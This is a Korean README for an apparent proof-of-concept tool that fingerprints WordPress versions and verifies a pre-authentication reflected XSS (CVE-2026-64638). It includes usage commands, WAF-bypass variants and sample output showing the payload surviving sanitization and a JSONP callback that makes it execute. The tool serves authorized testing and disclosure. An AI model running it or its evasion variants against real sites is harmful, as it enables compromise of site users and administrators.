
WordPress에서 사전 인증 반사형 XSS를 검증하고, 취약한 버전을 식별하며, 페이로드 반사 및 JSONP를 확인하고, HTML/curl PoC 아티팩트를 생성합니다.
CVE-2026-64638를 검증하기 위한 개념 증명(PoC) 도구입니다. 이 취약점은 WordPress 설치(버전 6.4 – 7.0.2)에 영향을 주는 사전 인증 반사형 크로스 사이트 스크립팅(XSS) 취약점입니다.
이 도구는 CVE-2026-64638에 대한 핑거프린팅, 검증, PoC 생성을 자동화합니다. 악성 페이로드를 배포하지 않고 대상 WordPress 설치가 사전 인증 반사형 XSS에 취약한지 여부를 안전하게 확인합니다. 대상이 취약한 것으로 확인되면 공인된 보안 테스트 및 버그 바운티 보고서 포함을 위한 HTML PoC를 생성할 수 있습니다.
standard, envelope, waf)을 지원합니다.readme.html 또는 등록된 스크립트 매개변수를 통해 WordPress 버전을 식별합니다.wp-login.php에 접근 가능하고 정상 작동하는지 확인합니다.wp-login.php에 전송하고, 응답에서 필요한 DOM 요소(예: ajaxurl, color-picker)가 무해화(샌니타이제이션) 과정을 통과한 후에도 그대로 남아 있는지 확인합니다.requests>=2.31.0, urllib3저장소를 클론하고 필요한 종속성을 설치합니다:
git clone https://github.com/your-username/xss2shell-poc.git
cd xss2shell-poc
pip install -r requirements.txt
이 도구는 환경 변수나 복잡한 구성 파일을 요구하지 않습니다. 모든 매개변수는 명령줄 인수를 통해 직접 전달됩니다.
승인된 대상을 상대로 Python 3로 도구를 실행합니다.
python3 xss2shell_poc.py -t https://target.com --check-only
python3 xss2shell_poc.py -t https://target.com
표준 페이로드가 WAF에 차단되거나 REST 엔드포인트가 HTTP 401을 반환하는 경우 대체 변형을 시도해 보세요:
python3 xss2shell_poc.py -t https://target.com --variant waf
python3 xss2shell_poc.py -t https://target.com --variant envelope
python3 xss2shell_poc.py -t https://target.com -o custom_poc.html
.
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── SECURITY.md
├── requirements.txt
└── xss2shell_poc.py
Target : https://target.com
Variant : standard
Mode : Full PoC
[>] Phase 1 — WordPress Version Fingerprint
[+] WordPress 7.0.2 — VULNERABLE (6.4 – 7.0.2)
[>] Phase 2 — Confirm Login Page
[+] wp-login.php reachable (HTTP 200)
[>] Phase 3 — Testing XSS Payload (variant: standard)
[+] XSS PAYLOAD SURVIVED SANITIZATION!
[+] Injected DOM elements found in response: ['id="ajaxurl"', 'id="color-picker"']
[>] Phase 4 — REST API JSONP Callback Check
[+] REST JSONP callback works: https://target.com/?rest_route=/&_method=GET&_jsonp=testcb
[+] jQuery will evaluate response as script → XSS fires automatically
이 저장소에는 보안 관련 테스트 도구가 포함되어 있습니다. 책임 있는 공개 정책과 승인된 사용 요구 사항은 SECURITY.md를 참조하십시오.
전문적인 기여를 환영합니다! 워크플로, 코드 품질 기준, 제출 지침에 대한 자세한 내용은 CONTRIBUTING.md를 참조하십시오.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.
승인된 용도로만 사용하십시오. 이 프로젝트는 시스템 소유자가 명시적이고 서면으로 허가한 공인된 침투 테스트, 보안 연구, 버그 바운티 프로그램을 위해서만 엄격히 제공됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 이 도구를 사용하지 마십시오. 작성자와 기여자는 이 소프트웨어 사용으로 인해 발생하는 오용, 손상 또는 법적 결과에 대해 책임을 지지 않습니다.